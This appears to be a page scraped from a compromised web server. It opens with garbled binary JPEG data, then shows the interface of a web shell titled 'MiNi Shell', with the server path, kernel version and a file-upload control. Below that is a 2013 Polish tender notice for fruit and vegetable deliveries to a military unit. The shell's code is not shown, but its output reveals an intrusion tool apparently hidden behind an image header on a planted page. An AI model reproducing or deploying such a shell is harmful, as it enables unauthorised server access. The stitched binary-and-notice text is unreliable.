JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131008/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131008/409150-N-2013.html

<p class="kh_header"><b>Oleszno: Dostawa warzyw gr. I i II i owoców gr. I realizowana do JW. 3378 Drawsko Pomorskie - znak postępowania 803/2013</b><br>
<b>Numer ogłoszenia: 409150 - 2013; data zamieszczenia: 08.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 3378 Drawsko Pomorskie , ul. Główna 1, 78-513 Oleszno, woj. zachodniopomorskie, tel. 94 7474572, faks 94 7474571, 7474605.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.16wog.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa warzyw gr. I i II i owoców gr. I realizowana do JW. 3378 Drawsko Pomorskie - znak postępowania 803/2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest: dostawa warzyw gr. I i II oraz owoców gr. I realizowana do Jednostki
Wojskowej 3378 z podziałem na następujące części: (zadania):
1) Zadanie 1 - Warzywa gr. I - Oleszno;
2) Zadanie 2 - Warzywa gr. I: Złocieniec, Złocieniec-Przedszkole;
3) Zadanie 3 - Warzywa gr. I - Wałcz
4) Zadanie 4 - Warzywa gr. I: Mirosławiec-Nadarzyce, Mirosławiec-Przedszkole
5) Zadanie 5 - Warzywa gr. II - Oleszno
6) Zadanie 6 - Warzywa gr. II: Złocieniec, Złocieniec-Przedszkole;
7) Zadanie 7 - Warzywa gr. II - Wałcz;
8) Zadanie 8 - Warzywa gr. II - Mirosławiec-Nadarzyce, Mirosławiec-Przedszkole
9) Zadanie 9 - Owoce gr. I - Oleszno
10) Zadanie 10 - Owoce gr. I: Złocieniec, Złocieniec-Przedszkole;
11) Zadanie 11 - Owoce gr. I - Wałcz;
12) Zadanie 12 - Owoce gr. I: Mirosławiec-Nadarzyce, Mirosławiec-Przedszkole

2. Wymogi dla przedmiotu zamówienia zawarto w załączniku nr 1 do SIWZ Szczegółowy opis przedmiotu zamówienia.
3. Opis przedmiotu zamówienia:
1) Przedmiot zamówienia winien spełniać wymagania wymienione w obowiązujących przepisach prawa
dotyczącego żywności a w szczególności:
a) ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia
(Dz. U. z 2010, Nr 136 , poz. 914 ze zm.),
b) ustawy z dnia 21 grudnia 2000 r., o jakości handlowej artykułów rolno - spożywczych. (Dz. U. z 2005 r. Nr
187, poz. 1577 ze zm.),
c) rozporządzenia (WE) Nr 178/2002 Parlamentu Europejskiego i Rady z dnia 28 stycznia 2002 r. ustalające
ogólne zasady i wymagania prawa żywnościowego, powołujące Europejski Urząd ds. Bezpieczeństwa żywności
oraz ustanawiające procedury w zakresie bezpieczeństwa żywności,
d) rozporządzenia (WE) Nr 852/2004 Parlamentu Europejskiego i Rady z dnia
29 kwietnia 2004 r. w sprawie higieny środków spożywczych,
e) rozporządzenia (WE) Nr 1935/2004 Parlamentu Europejskiego i Rady z dnia
27 października 2004 r., w sprawie materiałów i wyrobów przeznaczonych do kontaktu z żywnością oraz
uchylające Dyrektywy 80/590/EWG i 89/109/EWG,
f) rozporządzenia Ministra Rolnictwa i Rozwoju Wsi z dnia 10 lipca 2007 r.
w sprawie znakowania środków spożywczych ( Dz. U. Nr 137, poz. 966 ze zm.).
g) rozporządzenia Komisji (WE) Nr 1881/2006 z dnia 19 grudnia 2006 r. ustalającego najwyższe dopuszczalne
poziomy niektórych zanieczyszczeń w środkach spożywczych
h) rozporządzenia Komisji (WE) Nr 1441/2007 z dnia 5 grudnia 2007 r. zmieniającego rozporządzenie (WE) nr
2073/2005 w sprawie kryteriów mikrobiologicznych dotyczących środków spożywczych
2) Dostawy przedmiotu zamówienia będą realizowane w asortymencie, ilościach
i terminach wskazanych każdorazowo przez Odbiorcę w zamówieniu oraz
w opakowaniach przewidzianych w umowie - pod rygorem odmowy przyjęcia dostawy
i dokonania zapłaty,
3) Zamawiający zastrzega sobie możliwość w formie pisemnej zmniejszenia przyjętych
w umowie ilości, wartości i częstotliwości dostaw, w sytuacjach, których Zamawiający nie mógł przewidzieć
w chwili jej zawarcia (np. restrukturyzacja sił zbrojnych, zmiany ilości żywionych żołnierzy). Wartością umowy
będzie wówczas końcowa wartość faktycznie zrealizowanych dostaw. Zamawiający nie będzie ponosił
ujemnych skutków spowodowanych zmniejszeniem ilości i wartości dostaw przewidzianych w umowie,
4) Zamawiający jest uprawniony do zmiany asortymentów przewidzianych w umowie na inne asortymenty w niej
przewidziane z zastrzeżeniem, że nie może ulec zmianie wartość całej umowy. Zmiana może dotyczyć rodzaju
asortymentu, a także ich ilości.
5) W szczególnie uzasadnionych przypadkach (np. osiągania wyższych stanów gotowości bojowej, szkolenia
rezerw osobowych, likwidacji klęsk żywiołowych, restrukturyzacji sił zbrojnych, kryzysu, zagrożenia lub wojny
lub innych zadań postawionych Zamawiającemu przez organa władzy państwowej), Wykonawca zagwarantuje
bezpłatny dowóz towaru oraz zwiększenie ilości i częstotliwości dostaw (przy niezmienności wartości umowy)
do miejsc stacjonowania jednostek wojskowych oraz innych miejsc wskazanych przez Zamawiającego.
6) Zamawiający powiadomi pisemnie Wykonawcę o zmianach, o których mowa w pkt 5 ze wskazaniem ich
przyczyny, określeniem wymaganych ilości towaru do poszczególnych Odbiorców, częstotliwości dostaw
oraz wskazaniem ewentualnie nowych Odbiorców, z konkretnym wskazaniem dnia, do którego będą zmiany
obowiązywały.
7) Cena w okresie obowiązywania umowy będzie stała i nie podlega zmianie.
8) Dostawy przedmiotu zamówienia odbywać się będą do w godzinach od 7.30 do 12.30
Wykonawca dostarczy przedmiot zamówienia do odbiorców wyszczególnionych
w poszczególnych zadaniach, na poniżej podane adresy i z częstotliwością jak w szczegółowym opisie przedmiotu zamówienia załącznik Nr 1 do SIWZ:
1) ZADANIE NR: 1, 5, 9
Miejsce dostaw:
Magazyn żywnościowy JW 3378
Ul. Główna 1, 78-513 OLESZNO
Telefon do magazynu żywnościowego: 94 747 40 87
Telefon do kancelarii żywnościowej: 94 747 42 17
2) ZADANIE NR: 2, 6, 10
Miejsce dostaw:
Magazyn żywnościowy JW 3378 przy JW 1696
Ul. Czwartaków 4, 78-524 ZŁOCIENIEC
Telefon do magazynu żywnościowego : 943637165
Telefon do kancelarii żywnościowej: 94 363 75 40
Magazyn Przedszkola ul. Pancerniaków 5, 78-524 ZŁOCIENIEC
Telefon do magazynu przedszkola: 94 363 73 89
3) ZADANIE NR: 3, 7, 11
Miejsce dostaw:
Magazyn żywnościowy JW 3378 przy JW 4094
Ul. Kościuszki 24, 78-600 WAŁCZ
Telefon do magazynu żywnościowego: 67 250 20 85
Telefon do kancelarii żywnościowej: 67 250 20 80
4) ZADANIE NR: 4, 8, 12
Miejsce dostaw:
Magazyn żywnościowy JW 3378 przy JW 3299
78-651 MIROSŁAWIEC GÓRNY
Telefon do kancelarii żywnościowej: 67 250 57 88
Magazyn żywnościowy Przedszkola
ul. Osiedle XXX-lecia LLP, 78-651 MIROSŁAWIEC
Telefon do magazynu przedszkola: 67 250 57 02.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6, 03.22.11.11-7, 03.22.11.13-1, 03.22.11.14-8, 03.22.12.12-5, 03.22.14.20-6, 03.22.14.40-2, 03.22.12.70-9, 03.22.13.10-2, 03.22.12.40-0, 03.22.23.22-6, 03.22.23.21-9, 03.22.21.18-3, 03.22.23.31-2, 03.22.22.20-1, 03.22.23.40-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 12.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający  żąda od Wykonawców wniesienia wadium w kwocie:  
- zadanie 1 - 3 500 zł. 
- zadanie 2 - 250 zł. 
- zadanie 3 - 300 zł. 
- zadanie 4 - 500 zł. 
- zadanie 5 - 3 500 zł. 
- zadanie 6 - 700 zł. 
- zadanie 7 - 650 zł. 
- zadanie 8 - 800 zł. 
- zadanie 9 - 6 000 zł.
- zadanie 10 - 550 zł. 
- zadanie 11 - 800 zł. 
- zadanie 12 - 1 250 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten spełniają Wykonawcy, którzy: 
a.posiadają obowiązującą decyzję administracyjną właściwego organu Państwowej Inspekcji Sanitarnej w sprawie zatwierdzania, warunkowego zatwierdzania, przedłużania warunkowego zatwierdzania zakładów, które produkują lub wprowadzają do obrotu żywność pochodzenia nie zwierzęcego lub wprowadzają do obrotu produkty pochodzenia zwierzęcego, nie objęte urzędową kontrolą organów Inspekcji Weterynaryjnej, zgodnie z art. 62 ust.1 pkt 2 ustawy o bezpieczeństwie żywności i żywienia (Dz. U. z 2010, Nr 136, poz. 914 j. t.), (nie dotyczy rolników, w rozumieniu przepisów ustawy z dnia 20 grudnia 1990r.o ubezpieczeniu społecznym rolników - Dz. U. 2008 Nr 50 poz. 291 ze zm.) 
lub
b.zaświadczenie o wpisie do rejestru zakładów zgodne z rozporządzeniem Ministra Zdrowia z dnia 29 maja 2007 r., w sprawie wzorów dokumentów dotyczących rejestracji i zatwierdzania zakładów produkujących lub wprowadzających do obrotu żywność podlegających urzędowej kontroli Państwowej Inspekcji Sanitarnej (Dz. U. z 2007 r. Nr 106, poz. 730), (nie dotyczy rolników, w rozumieniu przepisów ustawy z dnia 20 grudnia 1990r. o ubezpieczeniu społecznym rolników - Dz. U. 2008 Nr 50 poz. 291 ze zm.)
Opis sposobu dokonywania oceny spełniania warunków wymaganych od Wykonawcy. 
1)Z treści załączonych dokumentów i oświadczeń winno wynikać jednoznacznie, 
iż Wykonawca spełnił ww. warunek. 
2)Zamawiający dokona oceny spełniania warunków wymaganych od Wykonawcy zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte    
w dokumentach i oświadczeniach załączonych do oferty, a wyszczególnionych 
w rozdziale VII SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje należycie dostawy odpowiadające swoim rodzajem dostawom stanowiącym przedmiot zamówienia i których suma dostaw odpowiada wartościom brutto podanym poniżej:
- zadanie 1 - 65 000 zł. 
- zadanie 2 - 5 000,00 zł. 
- zadanie 3 - 5 000,00 zł. 
- zadanie 4 - 9 000,00 zł. 
- zadanie 5 - 65 000,00 zł. 
- zadanie 6 - 13 000,00 zł. 
- zadanie 7 - 12 000,00 zł. 
- zadanie 8 - 14 000,00 zł. 
- zadanie 9 - 110 000,00 zł.
- zadanie 10 - 10 000,00 zł. 
- zadanie 11 - 15 000,00 zł. 
- zadanie 12 - 23 000,00 zł.
Uwaga:
W przypadku kiedy Wykonawca składa ofertę na kilka zadań winien zsumować wartość poszczególnych zadań i na łączną kwotę przedstawić wykaz dostaw i tak np.: jeżeli Wykonawca składa ofertę na zadania od 1 do 4 wykaz winien opiewać na wartość 
84 000,00zł. brutto.
Wykonawca w oświadczeniu wykaz głównych dostaw - załącznik nr 5 do SIWZ, obowiązany jest podać wartość dostaw, przedmiot dostaw, datę wykonania dostaw i odbiorców (podmioty) wraz z załączeniem dowodów (poświadczeń) potwierdzających, że dostawy te zostały wykonane lub są wykonywane należycie. 
Jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać dowodu (poświadczenia) o którym wyżej mowa zastępuje się to poświadczenie oświadczeniem Wykonawcy. 
W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania ww. dowodów (poświadczeń).
Opis sposobu dokonywania oceny spełniania warunków wymaganych od Wykonawcy. 
1)Z treści załączonych dokumentów i oświadczeń winno wynikać jednoznacznie, 
iż Wykonawca spełnił ww. warunek. 
2)Zamawiający dokona oceny spełniania warunków wymaganych od Wykonawcy zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte    
w dokumentach i oświadczeniach załączonych do oferty, a wyszczególnionych 
w rozdziale VII SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia (zał. nr 7 do SIWZ).
Opis sposobu dokonywania oceny spełniania warunków wymaganych od Wykonawcy. 
1)Z treści załączonych dokumentów i oświadczeń winno wynikać jednoznacznie, 
iż Wykonawca spełnił ww. warunek. 
2)Zamawiający dokona oceny spełniania warunków wymaganych od Wykonawcy zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte    
w dokumentach i oświadczeniach załączonych do oferty, a wyszczególnionych 
w rozdziale VII SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia (zał. nr 7 do SIWZ).
Opis sposobu dokonywania oceny spełniania warunków wymaganych od Wykonawcy. 
1)Z treści załączonych dokumentów i oświadczeń winno wynikać jednoznacznie, 
iż Wykonawca spełnił ww. warunek. 
2)Zamawiający dokona oceny spełniania warunków wymaganych od Wykonawcy zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte    
w dokumentach i oświadczeniach załączonych do oferty, a wyszczególnionych 
w rozdziale VII SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia (zał. nr 7 do SIWZ).
Opis sposobu dokonywania oceny spełniania warunków wymaganych od Wykonawcy. 
1)Z treści załączonych dokumentów i oświadczeń winno wynikać jednoznacznie, 
iż Wykonawca spełnił ww. warunek. 
2)Zamawiający dokona oceny spełniania warunków wymaganych od Wykonawcy zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte    
w dokumentach i oświadczeniach załączonych do oferty, a wyszczególnionych 
w rozdziale VII SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego, Wykonawca winien:
a)przedłożyć oświadczenie, że dostarczany przedmiot zamówienia odpowiada wymaganiom zamieszczonym w załączniku Nr 1 do SIWZ, zatytułowanym Szczegółowy opis przedmiotu zamówienia,
